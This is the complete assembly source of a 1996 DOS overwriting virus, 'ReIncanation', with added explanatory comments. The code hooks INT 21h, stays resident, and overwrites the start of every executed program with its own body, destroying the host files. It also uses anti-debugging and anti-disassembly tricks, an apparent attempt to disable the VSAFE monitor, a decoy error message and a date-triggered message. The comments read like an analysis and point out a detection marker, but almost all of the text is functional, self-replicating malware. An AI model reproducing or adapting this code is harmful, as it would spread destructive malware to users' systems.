
;-----------------------------------------------------------------------
; start - entry point of the virus body (an overwriting DOS infector).
; Syntax: MASM/TASM style (offset, word ptr, label byte, end start).
; Flow:   obfuscated prelude -> transient INT 3 swap -> INT 16h call the
;         author labels "anti_vsafe" -> decoy DOS error message ->
;         "are you there?" check (AX=9999h) -> if not yet resident, hook
;         INT 21h with new21 and stay resident via INT 27h.
; Segments: every offset below (new_int_3, old21, new21, endvir) is used
;         relative to CS, and DS is not set before the AH=25h calls, so
;         this presumably runs as a .COM image with CS=DS -- TODO confirm.
;-----------------------------------------------------------------------
start:
and al,21h
;anti_disassembler & anti_debugger
; The two backward jumps land inside the encoding of the preceding mov
; instructions, so the linear listing here is not the instruction stream
; that executes; the real sequence has to be traced from the raw bytes.
mov cx,09ebh
mov ax,0fe05h
jmp $-2 ;target is inside the immediate of the mov ax above
add ah,03bh
jmp $-10 ;target is 10 bytes back, again mid-instruction
;anti_debugger
; AH=35h returns the current INT 3 vector in ES:BX.
mov ax,3503h ;save int 3h in bx
int 21h ;do it
; AH=25h (AL still 03h): point INT 3 at new_int_3, taken as DS:DX.
mov ah,25h ;set new int 3h...
mov dx,offset new_int_3 ;...to new_int_3
int 21h ;do it
; A second AH=25h call with DX = the saved offset sets INT 3 back right
; away, so the swap is only transient. Note it uses DS as the segment
; although the saved vector's segment came back in ES. What the author
; intended with this brief swap is not evident from the code.
xchg bx,dx ;exchange bx,dx (restore original int 3h)
int 21h ;do it
;anti_vsafe
; The operands are built arithmetically (AX = 0FA02h, DX = 5945h, BL = 0
; after the add/sub) so the final values never appear literally in the
; image. Per the author's label this INT 16h call is aimed at the VSAFE
; resident monitor's interface.
mov ax,0f9f2h
add ax,10h
mov dx,5935h
add dx,10h
mov bl,10h
sub bl,10h
int 16h
; Decoy: print the German "Bad command or file name" text so the run
; looks like a failed command to the user.
mov ah,9h ;write string
mov dx,offset file_not_found ;Befehl oder Dateiname nicht gefunden.
int 21h ;do it
; Residency check: the resident handler (new21) answers AX=9999h with
; BX=9999h. This fixed request/response pair is a usable detection
; marker for the resident copy.
mov ax,9999h ;put 9999h in ax (for resident test)
int 21h ;do it
cmp bx,9999h ;compare bx,9999h
je already_there ;if bx=9999h, we are already resident and goto already_there
jmp makemegotsr ;else goto makemegotsr
already_there: ;already resident
int 20h ;exit
; Install: save the original INT 21h vector (ES:BX from AH=35h) into
; old21 -- the operand of the far jump at end21 -- then hook INT 21h.
makemegotsr:
mov ax,3521h ; get int 21h
int 21h ;do it
mov word ptr cs:old21,bx ; save old int 21h
mov word ptr cs:old21+2,es ;... save
mov dx,offset new21 ; new int 21 comes to offset new21
mov ax,2521h ; set new int 21h
int 21h ; do it
; INT 27h: terminate and stay resident, keeping CS:0 .. endvir in memory.
push cs ; push it
pop ds ; pop it
mov dx,offset endvir ; put everything of us in memory
int 27h ; do it
;-----------------------------------------------------------------------
; new21 - resident INT 21h handler installed by makemegotsr.
; Entry: CS = virus segment; all other registers belong to the caller.
; Handles two requests and passes everything else through unchanged:
;   AX=9999h        "are you there?" -> BX=9999h (AX and BX are swapped)
;   AX=4B00h (EXEC) -> overwrite the start of the file about to be run
;                      (caller's DS:DX filename) with the virus body,
;                      then fall through to the original INT 21h.
; Every INT 21h issued from inside this handler goes through the hooked
; vector and re-enters new21; none of those requests match 9999h or
; 4B00h, so they all pass straight through to end21.
; Exit: far jump through old21 (the saved original vector).
;-----------------------------------------------------------------------
new21: pushf ;new int 21
cmp ax,9999h ;resident test ???
jnz no_installation_check ;if no test goto no_install_check
xchg ax,bx ;if resident test, put 9999h in bx
no_installation_check: ;no_install_check
cmp ax,4b00h ;is there something executed?
jz infect ;yes, goto infect
jmp short end21 ;no, jmp to normal old int 21h
; infect: DS:DX still points at the caller's filename. No check is made
; for file type or an existing infection -- the bytes at the start of
; every EXEC'd file are replaced, so the host's original header is lost.
infect: ;infect the executed file
; AX=4301h with CX=0 clears all attributes (e.g. read-only) first.
mov ax,4301h ;set attributes
xor cx,cx ;to 0
int 21h ;do it
; AX=3D02h: open read/write; the handle comes back in AX.
mov ax,3d02h ;open file
int 21h ;do it
mov bx,ax ;put ax in bx, or.. xchg ax,bx.. but that doesn't work here
; Save the caller's registers, then switch DS to CS so the offsets below
; (start, endvir, text, file_not_found) resolve inside the virus image.
push ax ;push all
push bx
push cx
push dx
push ds
push cs
pop ds
; Seek to file offset 0: CX:DX = 0 (cwd yields DX=0 since AX=4200h is positive).
mov ax,4200h ;seek
xor cx,cx ;at beginning of tha file
cwd
int 21h ;do it
; Write the whole body start..endvir over the beginning of the file.
mov cx,offset endvir-offset start ;how much bytes to write
mov ah,40h ;write
mov dx,offset start ;from offset start
int 21h ;do it
; AX=5701h with CX=DX=0 stores a zero time and date on the file (cwd
; relies on AX, the byte count just returned, being non-negative).
; A zeroed timestamp on an executable is a visible artifact of infection.
cwd ; set date/time
xor cx,cx ; to zero
mov ax,5701h ;function for date/time
int 21h ;do it
mov ah,3eh ; close file
int 21h ;do it
; Payload trigger: AH=2Ah returns the system date with DH=month, DL=day.
mov ah,2ah ;get date
int 21h ;do it
cmp dh,4 ;compare month(dh) with 4
jne not_my_birthday ;not the 4th month, goto not_my_birthday
monat_ok:cmp dl,21 ;else compare day(dl) with 21
jne not_my_birthday ;not the 21th, goto not_my_birthday
; 21 April: show the credits string and block until a key is pressed.
tag_ok:mov ah,9h ;if it is the 21.April write message
mov dx,offset text ;of offset text
int 21h ;do it
mov ah,00h ;wait until keypressed
int 16h ;do it
jmp restore ;goto restore (tha registers)
; Any other day: print the decoy "Bad command or file name" message
; before passing the EXEC request on to the original handler.
not_my_birthday: ;if it is not_my_birthday
mov ah,9h ;write message
mov dx,offset file_not_found ;Befehl oder Dateiname nicht gefunden. (English: Bad command or filename.)
int 21h ;do it
restore:
pop ds ; pop all
pop dx
pop cx
pop bx
pop ax
; end21: restore the flags pushed on entry, then chain to the original
; INT 21h. The 0EAh byte is the JMP ptr16:16 opcode and old21 (filled in
; by makemegotsr) is its offset:segment operand.
end21: popf ; pop far
db 0eah ; jmp far (?)
old21 dw 0,0 ; where to store the old INT21
; Message strings, kept in the code segment and addressed with DS=CS.
; Both are '$'-terminated for INT 21h AH=09h.
; text: credits string, printed on 21 April (tag_ok) and by new_int_3.
text: db'ReIncanation written by Spooky. Austria 1996',0dh,0ah,'$' ;message for debugger or date 21.April
; file_not_found: German DOS "Bad command or file name." text, used as a
; decoy by start and by not_my_birthday.
file_not_found: db'Befehl oder Dateiname nicht gefunden.',0dh,0ah,'$' ;message file not found
;-----------------------------------------------------------------------
; new_int_3 - INT 3 (breakpoint) handler that start installs and then
; immediately sets back, so it is live only for that short window.
; If it does run, it prints the credits string, waits for a key
; (INT 16h AH=0) and terminates with INT 20h instead of returning with
; iret -- the author's apparent intent is to end a debugging session.
;-----------------------------------------------------------------------
new_int_3: ;new interrupt 3h for the debugger
mov ah,9h ;write string to standard output
mov dx,offset text ;text to write
int 21h ;do it
mov ah,00h ;wait until keypressed
int 16h ;do it
int 20h ;-> terminate debugging
; endvir marks the end of the image: start passes it to INT 27h as the
; resident size, and infect writes start..endvir into the target file.
endvir label byte ; End of file
end start ;entry point is start